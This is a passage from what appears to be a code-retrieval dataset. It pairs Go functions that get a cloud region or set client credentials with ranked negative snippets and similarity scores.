{\n\to.RegionID = regionID\n}", "func (d *DirectorySpec) RegisterMetricInRegion(\n\tpath string,\n\tmetric interface{},\n\tr *Region,\n\tunit units.Unit,\n\tdescription string) error {\n\treturn (*directory)(d).registerMetric(newPathSpec(path), metric, (*region)(r), unit, description)\n}", "func (o *DcimRacksListParams) SetRegionID(regionID *string) {\n\to.RegionID = regionID\n}", "func AzureRegion(region string) func(az *TierAzure) error {\n\treturn func(az *TierAzure) error {\n\t\taz.Region = region\n\t\treturn nil\n\t}\n}", "func (r *RollingStoreStats) SetRegionsStats(writeBytesRate, writeKeysRate float64) {\n\tr.Lock()\n\tdefer r.Unlock()\n\tr.movingAvgs[utils.StoreRegionsWriteBytes].Set(writeBytesRate)\n\tr.movingAvgs[utils.StoreRegionsWriteKeys].Set(writeKeysRate)\n}" ]
[ "0.85373044", "0.7420564", "0.74120873", "0.7402728", "0.7312569", "0.7230003", "0.71583086", "0.71443266", "0.70974576", "0.7046061", "0.70368326", "0.70208377", "0.69940025", "0.6929401", "0.68795156", "0.68710136", "0.68452626", "0.6774906", "0.67707384", "0.67402387", "0.6628588", "0.6478906", "0.6374332", "0.6360134", "0.63046116", "0.6259729", "0.6251179", "0.622746", "0.6223293", "0.6196814", "0.6183597", "0.6179938", "0.61682665", "0.6146667", "0.6067198", "0.6042167", "0.60216415", "0.5999807", "0.5983307", "0.5980192", "0.5979874", "0.5958471", "0.59571385", "0.59408444", "0.59124655", "0.59098285", "0.5844083", "0.5828872", "0.5764937", "0.57238096", "0.5689721", "0.56443685", "0.56382096", "0.562099", "0.56190664", "0.55662036", "0.55586565", "0.5529502", "0.5472438", "0.5471825", "0.54522115", "0.5451571", "0.54240984", "0.54006064", "0.53990847", "0.53865933", "0.5382693", "0.52783513", "0.527005", "0.52456045", "0.5241887", "0.5217334", "0.5189402", "0.51725614", "0.5166698", "0.5139613", "0.51344776", "0.5132448", "0.5118856", "0.5114069", "0.50946003", "0.50932044", "0.50873435", "0.5074522", "0.5072517", "0.506237", "0.50475234", "0.50378305", "0.49949655", "0.49878016", "0.4966296", "0.49625862", "0.4939614", "0.4936405", "0.49308246", "0.48660347", "0.48605672", "0.48408866", "0.4838454", "0.48312902" ]
0.7079721
9
GetRegion get current region.
func (s serverConfigV14) GetRegion() string { serverConfigMu.RLock() defer serverConfigMu.RUnlock() return s.Region }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (config *Config) GetRegion() string {\n\tregion := config.Region\n\n\tif region == \"\" {\n\t\tregion = Region[\"bj\"]\n\t}\n\n\treturn region\n}", "func (jbobject *RegionsRegions) GetCurrentRegion() *RegionsRegion {\n\tjret, err := javabind.GetEnv().CallStaticMethod(\"com/amazonaws/regions/Regions\", \"getCurrentRegion\", \"com/amazonaws/regions/Region\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tretconv := javabind.NewJavaToGoCallable()\n\tdst := &javabind.Callable{}\n\tretconv.Dest(dst)\n\tif err := retconv.Convert(javabind.ObjectRef(jret)); err != nil {\n\t\tpanic(err)\n\t}\n\tretconv.CleanUp()\n\tunique_x := &RegionsRegion{}\n\tunique_x.Callable = dst\n\treturn unique_x\n}", "func GetRegion(svc *ec2metadata.EC2Metadata) (string, error) {\n\tdoc, err := svc.GetInstanceIdentityDocument()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn doc.Region, nil\n}", "func GetRegion(ctx *pulumi.Context) string {\n\tv, err := config.Try(ctx, \"newrelic:region\")\n\tif err == nil {\n\t\treturn v\n\t}\n\tvar value string\n\tif d := internal.GetEnvOrDefault(\"US\", nil, \"NEW_RELIC_REGION\"); d != nil {\n\t\tvalue = d.(string)\n\t}\n\treturn value\n}", "func CurrentRegion() string {\n\treturn currentRegion\n}", "func (c *Client) GetRegion() string {\n\treturn c.config.Region\n}", "func (c *Client) GetRegion() Region {\n\treturn c.region\n}", "func (c *Client) GetRegion() Region {\n\treturn c.region\n}", "func (o *DisplayInfo) GetRegion() string {\n\tif o == nil || o.Region == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Region\n}", "func (m *Info) GetRegion() string {\n\treturn m.ec2Metadata.getRegion()\n}", "func (m *metadata) GetRegion() string {\n\treturn m.region\n}", "func (CcsAwsSession *ccsAwsSession) GetRegion() *string {\n\treturn CcsAwsSession.session.Config.Region\n}", "func (o *Workloadv1Location) GetRegion() string {\n\tif o == nil || o.Region == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Region\n}", "func (c *Client) Region() (string, error) {\n\treturn c.get(\"/region\")\n}", "func GetRegion(ctx *pulumi.Context) string {\n\tv, err := config.Try(ctx, \"aws:region\")\n\tif err == nil {\n\t\treturn v\n\t}\n\tif dv, ok := getEnvOrDefault(\"\", nil, \"AWS_REGION\", \"AWS_DEFAULT_REGION\").(string); ok {\n\t\treturn dv\n\t}\n\treturn v\n}", "func (r *Bucket) Region() pulumi.StringOutput {\n\treturn (pulumi.StringOutput)(r.s.State[\"region\"])\n}", "func (bc *BasicLineGraph) GetRegion(regionID uint3264) *RegionInfo {\n\tbc.RLock()\n\tdefer bc.RUnlock()\n\treturn bc.Regions.GetRegion(regionID)\n}", "func (a *Application) Region() *Region {\n\treturn a.makeRegion()\n}", "func GetRegion(licenseKey string) string {\n\tmatches := regionLicenseRegex.FindStringSubmatch(licenseKey)\n\tif len(matches) > 1 {\n\t\treturn matches[1]\n\t}\n\n\treturn \"\"\n}", "func GetRegion(configuredRegion string) (string, error) {\n\tif configuredRegion != \"\" {\n\t\treturn configuredRegion, nil\n\t}\n\n\tsess, err := session.NewSessionWithOptions(session.Options{\n\t\tSharedConfigState: session.SharedConfigEnable,\n\t})\n\tif err != nil {\n\t\treturn \"\", errwrap.Wrapf(\"got error when starting session: {{err}}\", err)\n\t}\n\n\tregion := aws.StringValue(sess.Config.Region)\n\tif region != \"\" {\n\t\treturn region, nil\n\t}\n\n\tmetadata := ec2metadata.New(sess, &aws.Config{\n\t\tEndpoint: ec2Endpoint,\n\t\tEC2MetadataDisableTimeoutOverride: aws.Bool(true),\n\t\tHTTPClient: &http.Client{\n\t\t\tTimeout: time.Second,\n\t\t},\n\t})\n\tif !metadata.Available() {\n\t\treturn DefaultRegion, nil\n\t}\n\n\tregion, err = metadata.Region()\n\tif err != nil {\n\t\treturn \"\", errwrap.Wrapf(\"unable to retrieve region from instance metadata: {{err}}\", err)\n\t}\n\n\treturn region, nil\n}", "func (c *namespaceCluster) GetRegion(id uint64) *core.RegionInfo {\n\tr := c.Cluster.GetRegion(id)\n\tif r == nil || !c.checkRegion(r) {\n\t\treturn nil\n\t}\n\treturn r\n}", "func (v *VCard) Region() string {\n\treturn v.getFirstAddressField(4)\n}", "func GetRegion(metaEndPoint string, preferEnv bool) string {\n\tvar region string\n\tif preferEnv {\n\t\tregion = getRegionFromEnv()\n\t\tif region == \"\" {\n\t\t\tregion = getRegionFromInstanceDocument(metaEndPoint)\n\t\t}\n\t} else {\n\t\tregion = getRegionFromInstanceDocument(metaEndPoint)\n\t\tif region == \"\" {\n\t\t\tregion = getRegionFromEnv()\n\t\t}\n\t}\n\tif region == \"\" {\n\t\tlog.Println(\"No region information available. Defaulting to us-west-2\")\n\t\tregion = \"us-west-2\"\n\t}\n\treturn region\n}", "func (t *Toon) Region() *Region {\n\treturn regionByID(t.RegionID())\n}", "func Get_region(ipaddress string) IP2Locationrecord {\n\treturn handleError(defaultDB.query(ipaddress, region))\n}", "func (c *Client) Region() string {\n\treturn c.region.String()\n}", "func (o MonitorV1Output) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *MonitorV1) pulumi.StringOutput { return v.Region }).(pulumi.StringOutput)\n}", "func (this *BuoyController) Region() {\n\tbuoyBusiness.Region(&this.BaseController, this.GetString(\":region\"))\n}", "func (a *AZs) GetRegion(az string) string {\n\tfor _, vaz := range *a {\n\t\tif az == vaz.Name {\n\t\t\treturn vaz.Region\n\t\t}\n\t}\n\treturn \"\"\n}", "func (o LookupSpacesBucketResultOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupSpacesBucketResult) string { return v.Region }).(pulumi.StringOutput)\n}", "func (c *MockAzureCloud) Region() string {\n\treturn c.Location\n}", "func (t *Territory) Region(ctx context.Context, db DB) (*Region, error) {\n\treturn RegionByRegionID(ctx, db, t.RegionID)\n}", "func (o InstanceOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *Instance) pulumi.StringOutput { return v.Region }).(pulumi.StringOutput)\n}", "func (o InstanceOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *Instance) pulumi.StringOutput { return v.Region }).(pulumi.StringOutput)\n}", "func (o GetTrafficPolicyDocumentRuleRegionOutput) Region() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v GetTrafficPolicyDocumentRuleRegion) *string { return v.Region }).(pulumi.StringPtrOutput)\n}", "func (r InvokeCommandRequest) GetRegionId() string {\n return r.RegionId\n}", "func getAwsRegion() (region string) {\n\tregion, _ = getAwsRegionE()\n\treturn\n}", "func (d *DB) Get_region(ipaddress string) (IP2Locationrecord, error) {\n\treturn d.query(ipaddress, region)\n}", "func (r AuthPrivilegeRequest) GetRegionId() string {\n return \"\"\n}", "func (r CreateBackupPlanRequest) GetRegionId() string {\n return r.RegionId\n}", "func (o StorageNodeStatusGeographyOutput) Region() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v StorageNodeStatusGeography) *string { return v.Region }).(pulumi.StringPtrOutput)\n}", "func (r InvokeRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r StatusReportRequest) GetRegionId() string {\n return r.RegionId\n}", "func GetRegion(kpp string) int {\n\ti, _ := strconv.Atoi(kpp[:2])\n\treturn i\n}", "func getRegion(name string) (aws.Region, error) {\n\tvar regions = map[string]aws.Region{\n\t\taws.APNortheast.Name: aws.APNortheast,\n\t\taws.APSoutheast.Name: aws.APSoutheast,\n\t\taws.APSoutheast2.Name: aws.APSoutheast2,\n\t\taws.EUCentral.Name: aws.EUCentral,\n\t\taws.EUWest.Name: aws.EUWest,\n\t\taws.USEast.Name: aws.USEast,\n\t\taws.USWest.Name: aws.USWest,\n\t\taws.USWest2.Name: aws.USWest2,\n\t\taws.USGovWest.Name: aws.USGovWest,\n\t\taws.SAEast.Name: aws.SAEast,\n\t}\n\tregion, ok := regions[name]\n\tif !ok {\n\t\treturn aws.Region{}, fmt.Errorf(\"No region matches %s\", name)\n\t}\n\treturn region, nil\n}", "func (o LookupRegionCommitmentResultOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupRegionCommitmentResult) string { return v.Region }).(pulumi.StringOutput)\n}", "func (c *RegionCache) GetRegion(key []byte) (*Region, error) {\n\tif r := c.getRegionFromCache(key); r != nil {\n\t\treturn r, nil\n\t}\n\tr, err := c.loadRegion(key)\n\treturn r, errors.Trace(err)\n}", "func (o GetGroupResultOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GetGroupResult) string { return v.Region }).(pulumi.StringOutput)\n}", "func (r *ProviderRegister) GetRegionCode() string {\n\treturn r.RegionCode\n}", "func (r SearchLogContextRequest) GetRegionId() string {\n return r.RegionId\n}", "func (s *square) getRegion() error {\n\treg := region{}\n\tswitch {\n\tcase s.pos.rowNumber >= 0 && s.pos.rowNumber <= 2:\n\t\treg.minRowNumber = 0\n\t\treg.maxRowNumber = 2\n\tcase s.pos.rowNumber >= 3 && s.pos.rowNumber <= 5:\n\t\treg.minRowNumber = 3\n\t\treg.maxRowNumber = 5\n\tcase s.pos.rowNumber >= 6 && s.pos.rowNumber <= 8:\n\t\treg.minRowNumber = 6\n\t\treg.maxRowNumber = 8\n\tdefault:\n\t\treturn fmt.Errorf(\"rowNumber %d is invalid\", s.pos.rowNumber)\n\t}\n\n\tswitch {\n\tcase s.pos.colNumber >= 0 && s.pos.colNumber <= 2:\n\t\treg.minColNumber = 0\n\t\treg.maxColNumber = 2\n\tcase s.pos.colNumber >= 3 && s.pos.colNumber <= 5:\n\t\treg.minColNumber = 3\n\t\treg.maxColNumber = 5\n\tcase s.pos.colNumber >= 6 && s.pos.colNumber <= 8:\n\t\treg.minColNumber = 6\n\t\treg.maxColNumber = 8\n\tdefault:\n\t\treturn fmt.Errorf(\"colNumber %d is invalid\", s.pos.colNumber)\n\t}\n\ts.reg = reg\n\treturn nil\n}", "func (r DescribeAuditLogRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r CreateImageFromSnapshotsRequest) GetRegionId() string {\n return r.RegionId\n}", "func (o PublicDelegatedPrefixPublicDelegatedSubPrefixResponseOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v PublicDelegatedPrefixPublicDelegatedSubPrefixResponse) string { return v.Region }).(pulumi.StringOutput)\n}", "func (o GetEndpointResultOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GetEndpointResult) string { return v.Region }).(pulumi.StringOutput)\n}", "func (o GetHostedZoneResultOutput) Region() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v GetHostedZoneResult) *string { return v.Region }).(pulumi.StringPtrOutput)\n}", "func (o *LogsArchiveDestinationAzure) GetRegion() string {\n\tif o == nil || o.Region == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Region\n}", "func (o ContainerV1Output) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *ContainerV1) pulumi.StringOutput { return v.Region }).(pulumi.StringOutput)\n}", "func (r DescribeCacheInstancesRequest) GetRegionId() string {\n return r.RegionId\n}", "func (d *Downloader) getRegion() string {\n\tif d.region != \"\" {\n\t\treturn d.region\n\t}\n\n\tregion, err := d.metadata.Region()\n\tif err != nil {\n\t\tlog.Warn(\"Could not retrieve the region from EC2 Instance Metadata. Error: %s\", err.Error())\n\t\tregion = config.DefaultRegionName\n\t}\n\td.region = region\n\n\treturn d.region\n}", "func Region() string {\n\tl := locale()\n\n\ttag, err := language.Parse(l)\n\tif err != nil {\n\t\treturn defaultRegion\n\t}\n\n\tregion, _ := tag.Region()\n\n\treturn region.String()\n}", "func (o HealthCheckAlarmIdentifierOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v HealthCheckAlarmIdentifier) string { return v.Region }).(pulumi.StringOutput)\n}", "func (o PublicAdvertisedPrefixPublicDelegatedPrefixResponseOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v PublicAdvertisedPrefixPublicDelegatedPrefixResponse) string { return v.Region }).(pulumi.StringOutput)\n}", "func (o GetTrafficPolicyDocumentRuleGeoProximityLocationOutput) Region() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v GetTrafficPolicyDocumentRuleGeoProximityLocation) *string { return v.Region }).(pulumi.StringPtrOutput)\n}", "func (o AiFeatureStoreEntityTypeFeatureOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *AiFeatureStoreEntityTypeFeature) pulumi.StringOutput { return v.Region }).(pulumi.StringOutput)\n}", "func (r LastDownsampleRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r DescribeAlarmHistoryRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r SetAuthConfigRequest) GetRegionId() string {\n return \"\"\n}", "func (r *reader) GetVyprvpnRegion() (region string, err error) {\n\treturn r.envParams.GetValueIfInside(\"REGION\", constants.VyprvpnRegionChoices())\n}", "func (r UpdateAsCronRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r *CountryRegionRequest) Get(ctx context.Context) (resObj *CountryRegion, err error) {\n\tvar query string\n\tif r.query != nil {\n\t\tquery = \"?\" + r.query.Encode()\n\t}\n\terr = r.JSONRequest(ctx, \"GET\", query, nil, &resObj)\n\treturn\n}", "func (o StorageNodeStatusGeographyPtrOutput) Region() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *StorageNodeStatusGeography) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Region\n\t}).(pulumi.StringPtrOutput)\n}", "func (r GetLargeScreenDataRequest) GetRegionId() string {\n return r.RegionId\n}", "func (o VolumeV2Output) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *VolumeV2) pulumi.StringOutput { return v.Region }).(pulumi.StringOutput)\n}", "func (r OnlineSqlTaskQueryRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r ReportTaskRequest) GetRegionId() string {\n return r.RegionId\n}", "func (bc *BasicLineGraph) GetRegions() []*RegionInfo {\n\tbc.RLock()\n\tdefer bc.RUnlock()\n\treturn bc.Regions.GetRegions()\n}", "func (o GatewayLocationDataOutput) Region() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v GatewayLocationData) *string { return v.Region }).(pulumi.StringPtrOutput)\n}", "func (r GeneralAlterEventRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r DescribeBillSummarysRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r AddTemplateRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r ModifyAppGeneralSettingByIdRequest) GetRegionId() string {\n return \"\"\n}", "func (o OceanOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *Ocean) pulumi.StringOutput { return v.Region }).(pulumi.StringOutput)\n}", "func (r DescribeSnapshotPolicyDiskRelationsRequest) GetRegionId() string {\n return r.RegionId\n}", "func (o ServerGroupOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *ServerGroup) pulumi.StringOutput { return v.Region }).(pulumi.StringOutput)\n}", "func (e Endpoint) Region() string {\n\tif e.Properties.CredentialScope.Region != \"\" {\n\t\treturn fmt.Sprintf(\"%q\", e.Properties.CredentialScope.Region)\n\t}\n\treturn \"region\"\n}", "func (r DeployRequest) GetRegionId() string {\n return \"\"\n}", "func getAwsRegionE() (region string, err error) {\n\n\tif os.Getenv(\"AWS_DEFAULT_REGION\") != \"\" {\n\t\tregion = os.Getenv(\"AWS_DEFAULT_REGION\")\n\t} else {\n\t\t// Grab it from this EC2 instace\n\t\tregion, err = ec2metadata.New(session.New()).Region()\n\t}\n\treturn\n}", "func (o RecordLatencyRoutingPolicyOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v RecordLatencyRoutingPolicy) string { return v.Region }).(pulumi.StringOutput)\n}", "func (o GatewayLocationDataPtrOutput) Region() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *GatewayLocationData) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Region\n\t}).(pulumi.StringPtrOutput)\n}", "func (r CreateClusterRequest) GetRegionId() string {\n return r.RegionId\n}", "func (o LookupDatabaseMysqlResultOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupDatabaseMysqlResult) string { return v.Region }).(pulumi.StringOutput)\n}", "func (o HealthCheckAlarmIdentifierPtrOutput) Region() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *HealthCheckAlarmIdentifier) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn &v.Region\n\t}).(pulumi.StringPtrOutput)\n}", "func (o GetTrafficPolicyDocumentEndpointOutput) Region() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v GetTrafficPolicyDocumentEndpoint) *string { return v.Region }).(pulumi.StringPtrOutput)\n}", "func (r ListSmsSendOverviewUsingGETRequest) GetRegionId() string {\n return \"\"\n}", "func (r GetBucketFilesRequest) GetRegionId() string {\n return r.RegionId\n}", "func (r DescribeSlowLogRequest) GetRegionId() string {\n return r.RegionId\n}", "func (o SslCertificateOutput) Region() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *SslCertificate) pulumi.StringOutput { return v.Region }).(pulumi.StringOutput)\n}", "func (o *VmRestorePoint) GetRegionId() string {\n\tif o == nil || o.RegionId == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.RegionId\n}", "func (c *Cluster) GetRegion(regionID uint64) (*metapb.Region, uint64) {\n\tc.RLock()\n\tdefer c.RUnlock()\n\n\tr := c.regions[regionID]\n\tif r == nil {\n\t\treturn nil, 0\n\t}\n\treturn proto.Clone(r.Meta).(*metapb.Region), r.leader\n}" ]
[ "0.74549794", "0.7424654", "0.73806536", "0.73781395", "0.7358673", "0.7336693", "0.7335368", "0.7335368", "0.7298301", "0.7223789", "0.72162765", "0.7190666", "0.714873", "0.7098763", "0.70885575", "0.69565016", "0.69310653", "0.6868309", "0.6810106", "0.6807861", "0.68055236", "0.680399", "0.6771882", "0.6702766", "0.66943246", "0.66630006", "0.66426516", "0.6634441", "0.66333693", "0.6612947", "0.66023767", "0.6595717", "0.6548525", "0.6548525", "0.65230817", "0.65230006", "0.65212864", "0.65140235", "0.65134716", "0.6508009", "0.6507792", "0.65006506", "0.6500463", "0.649801", "0.6491737", "0.64763916", "0.647496", "0.64680684", "0.6464586", "0.64635146", "0.6461789", "0.645402", "0.6447426", "0.64419264", "0.6438782", "0.6437045", "0.64141494", "0.6393972", "0.6391171", "0.6387007", "0.63688517", "0.6356774", "0.63438064", "0.63401794", "0.6339942", "0.632834", "0.6324095", "0.6318553", "0.63174313", "0.6303041", "0.6279074", "0.6270957", "0.6269515", "0.6242403", "0.6235032", "0.62331074", "0.62274", "0.62200725", "0.6206219", "0.6205562", "0.6193361", "0.6176073", "0.61693436", "0.6159458", "0.6155219", "0.6152754", "0.61514956", "0.6143219", "0.6137965", "0.6135781", "0.6130209", "0.6123306", "0.61195487", "0.6117652", "0.6113337", "0.6111781", "0.6094536", "0.60927624", "0.6091258", "0.60887206" ]
0.7288075
9
SetCredentials set new credentials.
func (s *serverConfigV14) SetCredential(creds credential) { serverConfigMu.Lock() defer serverConfigMu.Unlock() // Set updated credential. s.Credential = newCredentialWithKeys(creds.AccessKey, creds.SecretKey) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func SetCredentials(prodClientID, prodClientSecret, testClientID, testClientSecret string) {\n\tcreds = credentials{\n\t\tprodClientID: prodClientID,\n\t\tprodClientSecret: prodClientSecret,\n\t\ttestClientID: testClientID,\n\t\ttestClientSecret: testClientSecret,\n\t}\n}", "func (client *SyncClient) SetCredentials(credentials *SyncCredentials) error {\n\tif credentials == nil {\n\t\treturn errors.New(\"credentials must not be nil\")\n\t}\n\n\treturn cCall(func() C.obx_err {\n\t\tvar dataPtr unsafe.Pointer = nil\n\t\tif len(credentials.data) > 0 {\n\t\t\tdataPtr = unsafe.Pointer(&credentials.data[0])\n\t\t}\n\t\treturn C.obx_sync_credentials(client.cClient, credentials.cType, dataPtr, C.size_t(len(credentials.data)))\n\t})\n}", "func (a *API) SetCredentials(key string, secret string) {\r\n\ta.oauth_key = key\r\n\ta.oauth_secret = secret\r\n}", "func SetCredentials(ctx context.Context, creds *CredentialsCookie) context.Context {\n\treturn context.WithValue(ctx, \"creds\", creds)\n}", "func (mp *MassPayment) SetCredentials(user string, password string, signature string, apiVersion string) {\n\tmp.User = user\n\tmp.Password = password\n\tmp.Signature = signature\n\tmp.Version = apiVersion\n}", "func (o *Service) SetCredentials(v map[string]map[string]bool) {\n\to.Credentials = &v\n}", "func (cl *APIClient) SetCredentials(uid string, pw string) *APIClient {\n\tcl.socketConfig.SetLogin(uid)\n\tcl.socketConfig.SetPassword(pw)\n\treturn cl\n}", "func (a *API) SetCredentials(loginID, transactionKey string) {\n\ta.MerchantAuthentication = &MerchantAuthentication{loginID, transactionKey}\n}", "func (c *ThreeScaleClient) SetCredentials(credential string) {\n\tc.credential = credential\n}", "func (m *DeviceLocalCredentialInfo) SetCredentials(value []DeviceLocalCredentialable)() {\n err := m.GetBackingStore().Set(\"credentials\", value)\n if err != nil {\n panic(err)\n }\n}", "func SetCredentials(clientId, clientSecret string) {\n\toauthConfig.ClientID = clientId\n\toauthConfig.ClientSecret = clientSecret\n}", "func (b *Base) SetCredentials(apiKey, apiSecret, clientID, subaccount, pemKey, oneTimePassword string) {\n\tb.API.credMu.Lock()\n\tdefer b.API.credMu.Unlock()\n\tif b.API.credentials == nil {\n\t\tb.API.credentials = &Credentials{}\n\t}\n\tb.API.credentials.Key = apiKey\n\tb.API.credentials.ClientID = clientID\n\tb.API.credentials.SubAccount = subaccount\n\tb.API.credentials.PEMKey = pemKey\n\tb.API.credentials.OneTimePassword = oneTimePassword\n\n\tif b.API.CredentialsValidator.RequiresBase64DecodeSecret {\n\t\tresult, err := crypto.Base64Decode(apiSecret)\n\t\tif err != nil {\n\t\t\tb.API.AuthenticatedSupport = false\n\t\t\tb.API.AuthenticatedWebsocketSupport = false\n\t\t\tlog.Warnf(log.ExchangeSys,\n\t\t\t\twarningBase64DecryptSecretKeyFailed,\n\t\t\t\tb.Name)\n\t\t\treturn\n\t\t}\n\t\tb.API.credentials.Secret = string(result)\n\t} else {\n\t\tb.API.credentials.Secret = apiSecret\n\t}\n}", "func (api *HWApi) SetCredentials(c *HCSCredentials) {\n\tapi.hcsCredentials = c\n}", "func (options *UpdateActionOptions) SetCredentials(credentials []VariableData) *UpdateActionOptions {\n\toptions.Credentials = credentials\n\treturn options\n}", "func (options *CreateActionOptions) SetCredentials(credentials []VariableData) *CreateActionOptions {\n\toptions.Credentials = credentials\n\treturn options\n}", "func (s *GetSessionTokenOutput) SetCredentials(v *Credentials) *GetSessionTokenOutput {\n\ts.Credentials = v\n\treturn s\n}", "func (c *Client) SetServiceCredentials(serviceName string, credentialNames []string) (*Service, error) {\n\tservice, err := c.GetService(serviceName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\terr = c.EnsureGrants(serviceName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcredentials, err := c.FindCredentialsByName(credentialNames)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcredentialIDs := make([]string, 0, len(credentials))\n\tfor _, credential := range credentials {\n\t\tcredentialIDs = append(credentialIDs, credential.ID)\n\t}\n\n\tbody := RequestBody{\n\t\tCredentials: credentialIDs,\n\t\tBlindCredentials: []string{},\n\t\tAccount: service.Account,\n\t\tEnabled: service.Enabled,\n\t}\n\tvar response Service\n\terr = c.Request(\"PUT\", \"/v1/services/\"+serviceName, &body, &response)\n\tif err != nil {\n\t\treturn nil, err\n\t} else if response.Error != \"\" {\n\t\treturn nil, errors.New(response.Error)\n\t}\n\tif response.Revision != 0 {\n\t\terr := c.EnsureGrants(serviceName)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Could not ensure grants: %e\", err)\n\t\t}\n\t}\n\tc.services[serviceName] = &response\n\treturn &response, nil\n}", "func (s *GetFederationTokenOutput) SetCredentials(v *Credentials) *GetFederationTokenOutput {\n\ts.Credentials = v\n\treturn s\n}", "func (s *GetFederationTokenOutput) SetCredentials(v *Credentials) *GetFederationTokenOutput {\n\ts.Credentials = v\n\treturn s\n}", "func (m *Application) SetPasswordCredentials(value []PasswordCredentialable)() {\n m.passwordCredentials = value\n}", "func (connection *VSphereConnection) UpdateCredentials(username string, password string) {\n\tconnection.credentialsLock.Lock()\n\tdefer connection.credentialsLock.Unlock()\n\tconnection.Username = username\n\tconnection.Password = password\n}", "func (t *AuthorizationTransport) SetCredential(ak, sk, token string) {\n\tt.rwLocker.Lock()\n\tdefer t.rwLocker.Unlock()\n\tt.SecretID = ak\n\tt.SecretKey = sk\n\tt.SessionToken = token\n}", "func (cl *APIClient) SetRoleCredentials(uid string, role string, pw string) *APIClient {\n\tif len(role) > 0 {\n\t\treturn cl.SetCredentials(uid+\"!\"+role, pw)\n\t}\n\treturn cl.SetCredentials(uid, pw)\n}", "func (s *AssumeRoleWithWebIdentityOutput) SetCredentials(v *Credentials) *AssumeRoleWithWebIdentityOutput {\n\ts.Credentials = v\n\treturn s\n}", "func (s *AssumeRoleWithSAMLOutput) SetCredentials(v *Credentials) *AssumeRoleWithSAMLOutput {\n\ts.Credentials = v\n\treturn s\n}", "func (s *AssumeRoleOutput) SetCredentials(v *Credentials) *AssumeRoleOutput {\n\ts.Credentials = v\n\treturn s\n}", "func setAWSCredentials(awsCreds *AWSCredentials) error {\n\terr := setInstallAWSCredentials(awsCreds)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = setOperatorAWSCredentials(awsCreds)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (m *Application) SetKeyCredentials(value []KeyCredentialable)() {\n m.keyCredentials = value\n}", "func UpdateCredentials(c *Credentials) error {\n\toldCredential := *c\n\tif err := GetCredential(&oldCredential); err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn ErrCredentialsNotFound\n\t\t}\n\t\treturn err\n\t}\n\n\tif c.Login == \"\" {\n\t\tc.Login = oldCredential.Login\n\t}\n\tif c.Password == \"\" {\n\t\tc.Password = oldCredential.Password\n\t}\n\n\tc.Site = oldCredential.Site\n\n\tif err := db.ConnManager.Exec(sqlCredentialUpdate, c.Login, c.Password, c.Id); err != nil {\n\t\tif err == db.ErrNothingDone {\n\t\t\treturn ErrCredentialsNotFound\n\t\t}\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func setCredentials() *credentials.Credentials {\n\t// First, try the credentials file set by AWS CLI tool.\n\t// Note the empty string instructs to look under default file path (different based on OS).\n\t// This file can have multiple profiles and a default profile will be used unless otherwise configured.\n\t// See: https://godoc.org/github.com/aws/aws-sdk-go/aws/credentials#SharedCredentialsProvider\n\tcreds := credentials.NewSharedCredentials(\"\", cfg.AWS.Profile)\n\n\t// Second, use environment variables if set. The following are checked:\n\t// Access Key ID: AWS_ACCESS_KEY_ID or AWS_ACCESS_KEY\n\t// Secret Access Key: AWS_SECRET_ACCESS_KEY or AWS_SECRET_KEY\n\tenvCreds := 